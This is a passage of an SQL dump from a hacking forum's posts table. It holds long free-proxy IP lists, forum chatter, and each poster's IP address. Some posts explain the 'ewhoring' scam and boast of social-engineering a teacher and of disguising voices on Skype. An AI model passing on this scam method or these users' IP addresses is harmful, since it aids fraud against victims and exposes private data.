13.94:8080\r\n42.62.5.104:8080\r\n42.62.5.104:8001\r\n42.62.5.104:8081\r\n42.62.5.104:6675\r\n42.62.5.104:8000\r\n42.62.5.104:8085\r\n42.62.5.104:8090\r\n42.62.5.104:8118\r\n42.62.5.104:8888\r\n41.78.239.194:8080\r\n42.62.5.105:8080\r\n42.62.5.105:8085\r\n42.62.5.105:6675\r\n42.62.5.105:8000\r\n42.62.5.105:8888\r\n42.62.5.105:8090\r\n42.62.5.105:8001\r\n42.62.5.105:8118\r\n42.62.5.105:8081\r\n42.62.5.106:8001\r\n42.62.5.106:8080\r\n42.62.5.106:8081\r\n42.62.5.106:8085\r\n42.62.5.106:8090\r\n42.62.5.106:8118\r\n5.9.227.148:3128\r\n54.251.3.63:80\r\n46.248.164.74:80\r\n46.4.253.179:3128\r\n58.215.177.239:3128\r\n58.251.57.78:8001\r\n58.215.170.154:3128\r\n49.212.161.19:3128\r\n46.252.244.178:3128\r\n59.34.57.68:8080\r\n59.125.100.113:3128\r\n59.37.163.156:3128\r\n59.34.1.151:8080\r\n59.57.15.71:80\r\n60.190.129.52:3128\r\n60.2.227.123:3128\r\n60.28.219.218:80\r\n60.32.73.46:80\r\n61.152.176.48:80\r\n60.28.213.42:80\r\n61.135.208.184:80\r\n61.156.217.166:8000\r\n61.163.197.135:8080\r\n61.19.197.236:3128\r\n60.6.238.66:1337\r\n61.7.252.67:3128\r\n61.177.121.100:8888\r\n61.247.59.183:8080\r\n65.111.164.53:3128\r\n62.75.161.165:3128\r\n69.46.99.186:80\r\n63.238.52.89:8080\r\n74.86.2.131:8080\r\n65.117.207.142:3128\r\n65.117.207.142:8081\r\n64.62.184.25:3128\r\n71.189.47.2:8081\r\n76.103.101.126:3128\r\n77.38.171.87:8080\r\n74.208.204.187:80\r\n79.170.50.25:80\r\n79.101.37.138:8080\r\n80.241.82.10:3128\r\n79.101.37.131:8080\r\n77.222.128.230:3128\r\n79.101.37.133:8080\r\n80.58.250.68:80\r\n82.193.116.28:3128\r\n80.88.240.24:80\r\n80.88.240.27:80\r\n83.212.97.172:3128\r\n81.214.15.106:8080\r\n85.185.157.15:8080\r\n85.192.166.187:3128\r\n81.82.240.204:3128\r\n86.111.144.194:3128\r\n88.146.161.215:3128\r\n85.234.22.126:3128\r\n87.98.217.114:80\r\n91.121.58.235:3128\r\n89.35.78.8:8080\r\n90.150.144.46:8080\r\n92.62.229.171:8080\r\n94.23.56.105:80\r\n91.120.127.127:3128\r\n94.56.129.24:8080\r\n94.56.135.125:80\r\n92.242.241.81:3128\r\n95.172.68.150:80\r\n[/code]', '72.231.24.165', '1223104677', '1', '0', '1', '1347941113', '1', 'a075fe761c30d2485da547e986917f78', '0', '1347941113'); INSERT INTO mybb_posts VALUES('2298', '470', '2270', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '1', 't3h jok3r', '1347941431', '[quote=\'iTzIpod\' pid=\'2270\' dateline=\'1347935438\']\r\n[quote=\'t3h jok3r\' pid=\'2265\' dateline=\'1347935070\']\r\n[quote=\'iTzIpod\' pid=\'2247\' dateline=\'1347912878\']\r\n@HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry.\r\n\r\nOT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down.\r\n\r\n(It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression)\r\n[/quote]\r\n\r\n[b]I counted and it takes 36 seconds to scroll down including sirchamps post.[/b] I will wait few hours, if the OP doesn\'t update then I will.\r\n[/quote]\r\n\r\n\r\nSigh t3h jok3r...\r\n\r\nAre you serious? \r\nLol\r\nAlright. I will be releasing my Proxy List soon. Don\'t worry it\'ll be in a .txt file (Notepad)\r\n[/quote]\r\nMaybe OP thought of giving it out instead of having people to download, because you know about me when I was in XXXXX my internet connection was too slow and it couldn\'t even download a file easily.', '173.245.64.5', '-1376436219', '1', '0', '0', '0', '1', '8dfcb19aa2cb66806ef411ac528145e1', '0', '0'); INSERT INTO mybb_posts VALUES('2299', '441', '2053', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347941609', 'Damn it. I removed the download link for no reason then, do you have another DL link?', '173.245.64.5', '-1376436219', '1', '0', '0', '0', '1', '92f7f6e6def82b04342788da8d81060f', '0', '0'); INSERT INTO mybb_posts VALUES('2212', '471', '0', '7', 'L33THackers is not L33THacking', '0', '1', 't3h jok3r', '1347857603', 'There was a guy that sent me a PM asking me if l33thackin.net is the new site of l33thackers.net,.com and .nl.\r\n\r\nThe truth is that L33THacking.net is just a different site with the same theme. I came up with the name l33thackers first but since it was already in use I changed it to l33thacking. L33THacking.nets current theme is a free theme but with a lot of errors that\'s why it\'s unique NOT PAID. L33THacking.net and L33THackers.com are two different sites.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cbf7f90465868782f3b9db49bd84953f', '0', '0'); INSERT INTO mybb_posts VALUES('2213', '462', '2198', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347875229', '[quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\']\r\n:/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo.\r\n\r\nI would like to see Reloadzor try out for this though! :D Good luck everyone.\r\n[/quote]\r\n\r\ni came up with this:\r\n\r\n[img]http://i.imgur.com/VMmLc.png[/img]\n[hr]\nheres the facebook avatar (for t3h jok3r) just in case you like mine :)\n\n[img]http://i.imgur.com/qCK6A.png[/img]', '31.22.216.217', '521591001', '1', '0', '62', '1347875635', '1', '1b7f453e01417a0233d35abf91fa61ef', '0', '0'); INSERT INTO mybb_posts VALUES('2214', '431', '2166', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347877024', '[quote=\'iTzIpod\' pid=\'2166\' dateline=\'1347825208\']\r\nLOL\r\nGotta love the first one.\r\nAsian guy <3\r\n\r\nOr he looks asian..\r\n[/quote]\r\n\r\nthought jok3r loved asians, am I wrong? ^^', '31.22.216.217', '521591001', '1', '0', '0', '0', '1', '187cd302e5e53ed134bb88a7d0592dc8', '0', '0'); INSERT INTO mybb_posts VALUES('2215', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '20', 'JakeUS', '1347879193', 'Sounds like a good idea.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'f5682310ef616f62fbedcddf1cf05e30', '0', '0'); INSERT INTO mybb_posts VALUES('2216', '431', '2176', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '112', '??????Z', '1347880588', '[quote=\'iTzIpod\' pid=\'2176\' dateline=\'1347845009\']\r\n[quote=\'??????Z\' pid=\'2174\' dateline=\'1347839122\']\r\nLol ipod. \r\n\r\nSize: about the same size as yours Reloadzor\r\n Colour Scheme: silver, grey\r\n Render/Image: you choose, im not very creative :)\r\n Text: ??????Z\r\n\r\nCheers pal\r\n[/quote]\r\nWait. You didn\'t state what you wanted.\r\n\r\nAvatar\r\nSignature/Tag\r\nBanner\r\nEtc?\r\n[/quote]\r\n\r\nah yeah my bad, post edited', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', '6dfa39d767e1df4b918e95bb93e26e8d', '0', '0'); INSERT INTO mybb_posts VALUES('2217', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '112', '??????Z', '1347880872', 'try buying it in england, $700 starting price', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', 'abca939738b8e39cec7bcf0e6ba66c0c', '0', '0'); INSERT INTO mybb_posts VALUES('2218', '431', '2174', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347888951', '[quote=\'??????Z\' pid=\'2174\' dateline=\'1347839122\']\nLol ipod. \n\nSize: about the same size as yours Reloadzor\n Colour Scheme: silver, grey\n Render/Image: you choose, im not very creative :)\n Text: ??????Z\nSignature + avatar please buddy :)\n\nCheers pal\n[/quote]\n\nHope you like it:\n\n[img]http://i.imgur.com/lkLHB.png[/img]\n\nwill make an avatar matching the sig if you liked it.', '95.69.91.226', '1598381026', '1', '0', '62', '1347889093', '1', '7b88b8f9462b7bd6a88e1a20addba3bf', '0', '1347889093'); INSERT INTO mybb_posts VALUES('2219', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '61', 'NXK', '1347890940', 'Id suggest not publicy posting a upload/sell method since you can get it explioted.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '4d738fc0db5ff53a333b4684e54928b6', '0', '0'); INSERT INTO mybb_posts VALUES('2220', '423', '1937', '9', 'RE: Earn money by Copy & Pasting', '0', '61', 'NXK', '1347890999', 'Ill be trying this out After class, have you used this at all?', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '575320e063ad9c18827020d787c555c1', '0', '0'); INSERT INTO mybb_posts VALUES('2221', '472', '0', '7', 'School story', '0', '61', 'NXK', '1347892813', 'Sitting on my computer in my class, teacher walks up and sees me on l33t hacking..\nasks me why i`m on a hacking forum in the middle of class.\n\ni think about what iv`e learned from social engineering, convince the teach this is a 100% white hat hacking forum based on tweeking windows to make your pc run faster.\n\nIt was a close one because he was explaining to me that I could have been in alot of trouble.', '38.104.158.106', '644390506', '1', '0', '61', '1347895964', '1', '4564277a5678246cdcc7dac2423f2f43', '0', '1347895964'); INSERT INTO mybb_posts VALUES('2222', '472', '2221', '7', 'RE: School story', '0', '62', 'R?????zo?', '1347894172', 'you just SE\'ed your teacher haha, even though he might investigate about this website later..', '95.69.91.226', '1598381026', '1', '0', '0', '0', '1', 'eed4c0c714c05d0be17b2a331ec86b63', '0', '0'); INSERT INTO mybb_posts VALUES('2223', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '53', 'sirchamp', '1347895225', 'Firstly thanks for the list. I tested all of the proxies. Here are the ones that work:\n[code]\n1.36.21.178:3128\n103.3.221.154:8080\n103.3.221.153:8080\n103.247.23.26:8080\n109.106.192.124:3128\n110.137.47.23:8080\n110.139.183.88:8080\n111.68.97.178:8080\n112.133.201.67:3128\n112.125.42.20:10080\n113.105.181.77:3128\n113.106.194.222:82\n113.207.124.165:8080\n114.134.75.82:3128\n114.80.130.220:13992\n114.35.167.38:8080\n114.80.130.220:17946\n114.80.130.220:8000\n114.80.130.220:25782\n114.80.130.220:8080\n114.80.130.220:8888\n114.80.130.221:8001\n114.80.130.221:8081\n114.80.130.221:8085\n114.80.130.221:8090\n114.80.130.221:8118\n114.80.130.221:8888\n115.124.0.68:443\n115.124.0.68:80\n114.80.130.220:8001\n114.80.130.220:8081\n114.80.130.220:8090\n114.80.130.221:8000\n114.80.130.221:8080\n114.80.130.220:8085\n114.80.130.220:8118\n114.80.130.220:8909\n114.80.130.221:8909\n117.218.37.18:3128\n118.174.133.14:3128\n118.142.35.126:3128\n118.186.9.21:80\n118.96.231.62:3128\n118.96.251.234:8080\n118.96.127.10:3128\n118.96.151.221:3128\n118.96.230.118:8080\n118.97.47.35:3128\n118.97.44.154:3128\n118.97.210.75:3128\n119.30.112.212:8080\n119.46.68.228:443\n119.18.145.147:8087\n119.46.68.228:80\n119.46.68.232:443\n119.46.68.232:80\n119.235.253.152:3128\n121.15.167.231:8080\n121.18.231.102:54321\n121.18.231.98:31281\n119.254.90.18:8080\n121.101.211.31:3128\n119.32.229.40:8909\n121.18.231.102:19279\n119.46.90.28:80\n122.113.28.52:3128\n122.155.12.151:3128\n122.3.237.161:3128\n122.56.15.70:80\n122.72.124.2:80\n122.72.124.31:80\n122.72.80.106:80\n122.72.80.108:80\n122.72.80.101:80\n123.125.116.243:6675\n123.136.71.152:80\n123.136.71.154:80\n123.136.71.156:80\n123.108.249.186:80\n123.108.249.186:8080\n124.158.18.230:443\n124.158.18.230:80\n124.207.162.119:80\n124.158.9.32:3128\n124.207.162.190:80\n124.207.162.118:80\n125.39.93.69:8888\n125.76.237.68:80\n125.39.93.68:8888\n14.139.230.114:3128\n133.26.102.121:80\n125.165.50.254:8080\n128.91.49.131:3128\n173.15.194.228:3128\n146.255.9.124:3128\n173.219.189.95:3128\n175.41.132.160:80\n174.69.244.60:8080\n176.31.107.35:3128\n173.236.204.117:8080\n177.103.215.233:3128\n177.103.139.64:3128\n177.103.229.35:80\n178.157.62.242:80\n177.64.155.216:8080\n178.157.59.106:3128\n178.63.84.146:3128\n180.183.66.177:3128\n180.244.223.223:3128\n180.247.198.155:3128\n183.89.17.221:3128\n186.237.16.196:80\n186.92.227.113:8080\n187.44.1.171:8080\n189.51.5.218:3128\n189.8.69.36:80\n189.26.236.87:3128\n189.8.69.39:443\n189.39.120.4:3128\n189.8.69.39:80\n189.84.112.118:3128\n190.137.44.81:8080\n190.146.1.162:3128\n190.203.11.41:8080\n190.66.1.39:8080\n190.85.37.90:3128\n190.85.37.90:8080\n193.89.116.105:443\n193.89.116.105:80\n193.89.116.106:443\n193.89.116.106:80\n193.89.116.107:443\n193.89.116.107:80\n190.79.253.98:8080\n190.79.66.27:8080\n193.116.157.195:80\n200.14.41.24:3128\n200.14.46.105:3128\n195.158.108.84:3128\n200.146.104.121:3128\n200.182.173.202:3128\n200.54.92.187:3128\n200.48.39.22:3128\n200.54.92.187:80\n200.94.17.249:3128\n200.94.17.249:8080\n200.249.144.86:6588\n201.148.26.81:8080\n201.116.187.236:3128\n200.71.204.150:80\n201.244.71.62:3128\n201.236.80.197:3128\n202.106.16.116:3128\n202.106.16.20:3128\n202.106.16.36:3128\n202.106.16.68:3128\n202.109.123.180:80\n202.112.114.17:3128\n201.39.174.82:3128\n202.127.28.67:3128\n202.162.198.178:8000\n202.29.97.5:3128\n202.3.247.118:80\n202.143.146.199:8080\n202.182.54.156:80\n202.57.4.124:8089\n202.66.128.126:3128\n202.62.98.242:8080\n202.182.54.158:80\n202.71.99.222:80\n202.91.81.116:8080\n202.75.217.156:80\n202.37.120.234:8080\n202.90.128.162:3128\n202.71.99.222:8080\n202.98.123.126:8080\n203.114.112.101:3128\n203.172.188.34:80\n203.189.89.153:8080\n203.20.238.21:80\n203.20.55.55:443\n203.20.55.55:80\n202.94.84.202:3128\n203.20.55.57:443\n203.20.55.57:80\n202.96.136.169:3128\n203.93.28.166:8080\n203.77.246.60:3128\n209.51.184.3:80\n209.51.184.6:443\n209.51.184.6:80\n210.101.131.231:8080\n210.13.71.73:80\n210.13.71.76:80\n202.95.155.55:3128\n210.13.71.77:80\n203.77.232.99:8080\n203.93.104.20:80\n209.62.12.130:8118\n210.19.83.200:80\n210.19.83.197:80\n210.19.83.202:80\n210.101.131.232:8080\n210.76.127.35:3128\n210.211.109.244:8081\n206.17.82.114:80\n208.51.184.58:3128\n211.136.10.24:80\n211.136.10.25:80\n211.136.10.29:80\n211.136.10.30:80\n210.75.120.3:80\n211.142.236.132:81\n211.142.236.136:80\n210.22.13.104:80\n211.100.61.202:3128\n211.161.152.100:80\n211.100.49.9:3128\n211.162.121.182:80\n211.162.121.183:80\n211.161.152.107:80\n211.144.76.58:9000\n212.33.245.235:3128\n213.186.122.123:3128\n213.42.124.107:80\n211.94.93.224:3128\n212.93.195.229:3128\n217.219.129.20:80\n217.219.129.20:3128\n218.108.242.108:3128\n218.16.145.109:8080\n218.152.121.184:8080\n218.241.153.43:8080\n218.247.129.2:80\n218.247.138.40:80\n218.76.140.62:3128\n218.63.168.253:3128\n218.84.126.82:3128\n218.26.251.168:1337\n218.29.54.105:80\n218.5.74.199:3128\n219.230.71.82:3128\n219.234.82.62:6666\n219.234.82.62:8001\n219.234.82.62:8000\n219.234.82.62:8081\n219.234.82.62:8085\n219.133.36.198:80\n218.94.1.166:82\n219.234.82.62:8888\n219.234.82.76:8909\n219.234.82.62:8909\n219.234.82.78:6666\n219.234.82.78:14128\n219.130.39.9:3128\n219.234.82.78:80\n219.234.82.78:8001\n219.234.82.78:8080\n219.234.82.78:8081\n219.234.82.78:8085\n219.234.82.62:8080\n219.234.82.78:81\n219.234.82.78:82\n219.234.82.78:8090\n219.234.82.78:83\n219.234.82.78:84\n219.234.82.62:8090\n219.92.6.245:3128\n220.225.4.250:8080\n220.113.5.198:8080\n219.94.243.100:8080\n220.195.192.172:80\n221.2.228.202:8000\n221.2.174.164:8082\n221.214.218.148:3128\n221.229.255.50:3128\n220.181.55.11:80\n222.124.178.98:3128\n222.127.106.89:3128\n222.134.74.30:8080\n222.197.181.5:3128\n222.74.212.66:808\n222.92.116.10:80\n223.19.187.227:3128\n222.74.98.234:8080\n23.20.161.66:80\n223.202.8.69:3128\n41.189.36.26:3128\n223.27.80.35:8080\n41.222.209.77:8080\n41.223.56.140:80\n37.59.130.31:80\n41.215.122.65:8080\n41.75.201.146:3128\n41.89.130.2:3128\n41.72.213.94:8080\n42.62.5.104:8080\n42.62.5.104:8001\n42.62.5.104:8081\n42.62.5.104:6675\n42.62.5.104:8000\n42.62.5.104:8085\n42.62.5.104:8090\n42.62.5.104:8118\n42.62.5.104:8888\n41.78.239.194:8080\n42.62.5.105:8080\n42.62.5.105:8085\n42.62.5.105:6675\n42.62.5.105:8000\n42.62.5.105:8888\n42.62.5.105:8090\n42.62.5.105:8001\n42.62.5.105:8118\n42.62.5.105:8081\n42.62.5.106:8001\n42.62.5.106:8080\n42.62.5.106:8081\n42.62.5.106:8085\n42.62.5.106:8090\n42.62.5.106:8118\n5.9.227.148:3128\n54.251.3.63:80\n46.248.164.74:80\n46.4.253.179:3128\n58.215.177.239:3128\n58.251.57.78:8001\n58.215.170.154:3128\n49.212.161.19:3128\n46.252.244.178:3128\n59.34.57.68:8080\n59.125.100.113:3128\n59.37.163.156:3128\n59.34.1.151:8080\n59.57.15.71:80\n60.190.129.52:3128\n60.2.227.123:3128\n60.28.219.218:80\n60.32.73.46:80\n61.152.176.48:80\n60.28.213.42:80\n61.135.208.184:80\n61.156.217.166:8000\n61.163.197.135:8080\n61.19.197.236:3128\n60.6.238.66:1337\n61.7.252.67:3128\n61.177.121.100:8888\n61.247.59.183:8080\n65.111.164.53:3128\n62.75.161.165:3128\n69.46.99.186:80\n63.238.52.89:8080\n74.86.2.131:8080\n65.117.207.142:3128\n65.117.207.142:8081\n64.62.184.25:3128\n71.189.47.2:8081\n76.103.101.126:3128\n77.38.171.87:8080\n74.208.204.187:80\n79.170.50.25:80\n79.101.37.138:8080\n80.241.82.10:3128\n79.101.37.131:8080\n77.222.128.230:3128\n79.101.37.133:8080\n80.58.250.68:80\n82.193.116.28:3128\n80.88.240.24:80\n80.88.240.27:80\n83.212.97.172:3128\n81.214.15.106:8080\n85.185.157.15:8080\n85.192.166.187:3128\n81.82.240.204:3128\n86.111.144.194:3128\n88.146.161.215:3128\n85.234.22.126:3128\n87.98.217.114:80\n91.121.58.235:3128\n89.35.78.8:8080\n90.150.144.46:8080\n92.62.229.171:8080\n94.23.56.105:80\n91.120.127.127:3128\n94.56.129.24:8080\n94.56.135.125:80\n92.242.241.81:3128\n95.172.68.150:80\n[/code]', '188.155.56.90', '-1130678182', '1', '0', '53', '1347980791', '1', '91fa620a502ed9ed07b311570a9b369b', '0', '1347980791'); INSERT INTO mybb_posts VALUES('2224', '472', '2222', '7', 'RE: School story', '0', '61', 'NXK', '1347895986', '[quote=\'R?????zo?\' pid=\'2222\' dateline=\'1347894172\']\r\nyou just SE\'ed your teacher haha, even though he might investigate about this website later..\r\n[/quote]\r\n\r\nId probably laugh if he does.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '7c14671eb3322a3f9dac7d79a0fb4703', '0', '0'); INSERT INTO mybb_posts VALUES('2225', '423', '1937', '9', 'RE: Earn money by Copy & Pasting', '0', '62', 'R?????zo?', '1347897262', 'im gonna try this, looks promising.\nI\'m just scared if it is over saturated already :P', '95.69.91.226', '1598381026', '1', '0', '0', '0', '1', 'c9f4f938b263193e2efe5732a69d4791', '0', '0'); INSERT INTO mybb_posts VALUES('2226', '465', '2194', '11', 'RE: What is ewhoring', '0', '53', 'sirchamp', '1347898147', 'Nope. Basically you just get someone who pays you if you show him a \"private show\"of you. But you just download a video of the internet and show the video of some women to the payer. And he will think the women is you and will pay you for giving him a private show. Real E-Whores do the same thing but they do the private show live in front of the webcam', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ca8aae5876c44338b236dbe82585f085', '0', '0'); INSERT INTO mybb_posts VALUES('2227', '462', '2213', '35', 'RE: Vote for LHs new logo', '0', '172', 'MistaCode', '1347900531', '[quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\']\r\n[quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\']\r\n:/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo.\r\n\r\nI would like to see Reloadzor try out for this though! :D Good luck everyone.\r\n[/quote]\r\n\r\ni came up with this:\r\n\r\n[img]http://i.imgur.com/VMmLc.png[/img]\r\n[hr]\r\nheres the facebook avatar (for t3h jok3r) just in case you like mine :)\r\n\r\n[img]http://i.imgur.com/qCK6A.png[/img]\r\n[/quote]\r\n\r\nLooks pretty nice, what font y used?', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '4b88559e0281a3397aa00948f43798f6', '0', '0'); INSERT INTO mybb_posts VALUES('2228', '388', '1781', '52', 'RE: Request for the coders group', '0', '67', 'HoverCatz', '1347902744', 'I live in norway, we dont support email sms\'s', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'd11b4dbf0a6f369f40d1707e72ea6dd6', '0', '0'); INSERT INTO mybb_posts VALUES('2229', '462', '2227', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347906196', '[quote=\'MistaCode\' pid=\'2227\' dateline=\'1347900531\']\r\nLooks pretty nice, what font y used?\r\n[/quote]\r\n\r\nhttp://www.dafont.com/transformers-movie.font\r\nLOL', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4af01a7f00d4118f859ca286d84fe41a', '0', '0'); INSERT INTO mybb_posts VALUES('2230', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '67', 'HoverCatz', '1347909290', 'Please put this in a txt file, as it takes ages to load on any i devices :)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'a3bd0904178d4bc96ce2ec95c8fdb0db', '0', '0'); INSERT INTO mybb_posts VALUES('2231', '461', '2171', '43', 'RE: some PID\'s List', '0', '82', 'iTzIpod', '1347909980', 'Thanks for the contribution. But I\'m not looking for the any of the item\'s PIDs at the moment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc43b16b6a314964f2eadd95c0f1c1ca', '0', '0'); INSERT INTO mybb_posts VALUES('2232', '436', '1988', '7', 'RE: Motivation', '0', '82', 'iTzIpod', '1347910025', 'Yeah. JakeUS, that has happened to some members.\nAnd might happen to me.\nMight..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '98ff11a199c7f68bc0aa06f78c647eee', '0', '0'); INSERT INTO mybb_posts VALUES('2233', '437', '1995', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347910102', 'Wait. Is it possible to get a click +1 from the same IP? Like I already clicked them before.\nBut if I click them again, will your clicks go up?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c5db599c5725b2b4cec22a3cfa1f8d34', '0', '0'); INSERT INTO mybb_posts VALUES('2234', '363', '2189', '8', 'RE: Top 10 songs of September 2012', '0', '82', 'iTzIpod', '1347910227', '[quote=\'Romdu62\' pid=\'2189\' dateline=\'1347850406\']\r\nOh My SONGS\r\n\r\nYou don\'t like that song by Lil Wayne.\r\n[/quote]\r\nNot sure if spamming or not.. I don\'t understand what you\'re talking a bout..\r\n\r\n\r\n\r\nWhat Lil Wayne song?\r\n\r\nWhat do you mean \"Oh My SONGS\"\r\n\r\nWho are you talking too?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd0fc8a17b794e7f0aa17672ca0526d8b', '0', '0'); INSERT INTO mybb_posts VALUES('2235', '403', '2196', '18', 'RE: Youtube Bot', '0', '82', 'iTzIpod', '1347910368', '[quote=\'swa4567\' pid=\'2196\' dateline=\'1347851956\']\r\nCan you post a screenshot please\r\n[/quote]\r\n\r\nOf the bot? If so, you gotta wait.\r\nI\'m on Mobile.\r\n\r\nI\'m sorry if I don\'t since I might forget..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '222b0ff665b240adb3d1d69a29e23b5d', '0', '0'); INSERT INTO mybb_posts VALUES('2236', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '82', 'iTzIpod', '1347910574', 'Works really well.\n\nThanks for telling me about Clownfish. =]\n\nGood for SEing via Skype Calling', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'da8d7011aa5a5d44857192c3988f0e7c', '0', '0'); INSERT INTO mybb_posts VALUES('2237', '468', '2204', '16', 'RE: [TUT] Free Dre Beats [Unconfirmed]', '0', '82', 'iTzIpod', '1347910606', 'I\'ve seen this method a couple times. It didn\'t work for some members on a different forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '755194854bda4e18a1c4f0b184a5bdbb', '0', '0'); INSERT INTO mybb_posts VALUES('2238', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1347910671', '/me is trying to help t3h jok3r help LH get more active', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd811e2c2c79e21a2480aa2449ccf0af', '0', '0'); INSERT INTO mybb_posts VALUES('2239', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1347910721', 'Banned for having more rep than me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0eb65f2dc086a32fadd066afd8e925f6', '0', '0'); INSERT INTO mybb_posts VALUES('2240', '345', '1632', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347910842', 'Will try this out now.\n\nMight take a while since I have loads of homework to do.\n[hr]\nEDIT: Sorry, but these are very bad..\nI had to finish up my homework..\nTruly sorry.\nHere you go\nMade a few.\nNOTE: Some of them, I messed up on. So.. yeah..\n[img]http://i.imgur.com/6IrpX.png[/img]\n[img]http://i.imgur.com/TA6YN.png[/img]\n[IMG]http://i.imgur.com/X7sfo.png[/IMG]\n[IMG]http://i.imgur.com/6Qoo4.png[/IMG]\n[img]http://i.imgur.com/iLWJi.png[/img]\n[IMG]http://i.imgur.com/r6WJM.png[/IMG]\n[IMG]http://i.imgur.com/hvGIF.png[/IMG]\n[IMG]http://i.imgur.com/ordbC.png[/IMG]\n[IMG]http://i.imgur.com/sNucP.png[/IMG]\n[IMG]http://i.imgur.com/CWKlk.png[/IMG]\n[IMG]http://i.imgur.com/jXBZk.png[/IMG]\n[IMG]http://i.imgur.com/0pJoK.png[/IMG]\n@NXK, sorry :/', '24.212.197.164', '416597412', '1', '0', '82', '1347915924', '1', 'e1115cef125d716d9b00f8ade7d60aaa', '0', '1347915924'); INSERT INTO mybb_posts VALUES('2241', '471', '2212', '7', 'RE: L33THackers is not L33THacking', '0', '82', 'iTzIpod', '1347910914', 'I knew this already :p\nBut other than that, thanks for the notice.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd6b80a5b8b4b9a3187096cc958f02a2e', '0', '0'); INSERT INTO mybb_posts VALUES('2242', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '82', 'iTzIpod', '1347910961', 'When are you doing this? Like what time?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '48847fce90f8b90b2d64ffefee5b19db', '0', '0'); INSERT INTO mybb_posts VALUES('2243', '443', '2217', '42', 'RE: Apple Announces the iPhone 5', '0', '82', 'iTzIpod', '1347911259', '[quote=\'??????Z\' pid=\'2217\' dateline=\'1347880872\']\r\ntry buying it in england, $700 starting price\r\n[/quote]\r\n\r\nOh damn really?\r\n\r\nThat must suck :uh yeah:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cb00389e278ce6ac5fd33b39812554cc', '0', '0'); INSERT INTO mybb_posts VALUES('2244', '472', '2221', '7', 'RE: School story', '0', '82', 'iTzIpod', '1347911454', 'Lol what a close call :p\n\nGonna reread this :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '071d119f200777e6221a61b20adb9118', '0', '0'); INSERT INTO mybb_posts VALUES('2246', '423', '1937', '9', 'RE: Earn money by Copy & Pasting', '0', '82', 'iTzIpod', '1347912711', 'It shouldn\'t be saturated.\n\n@NXK, yes I have.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ed0f3af79a760f534c447926a45e6f4d', '0', '0'); INSERT INTO mybb_posts VALUES('2247', '470', '2211', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '82', 'iTzIpod', '1347912878', '@HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry.\n\nOT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down.\n\n(It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a38566f0579802776a262816989e16d', '0', '0'); INSERT INTO mybb_posts VALUES('2248', '462', '2213', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347912948', '[quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\']\r\n[quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\']\r\n:/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo.\r\n\r\nI would like to see Reloadzor try out for this though! :D Good luck everyone.\r\n[/quote]\r\n\r\ni came up with this:\r\n\r\n[img]http://i.imgur.com/VMmLc.png[/img]\r\n[hr]\r\nheres the facebook avatar (for t3h 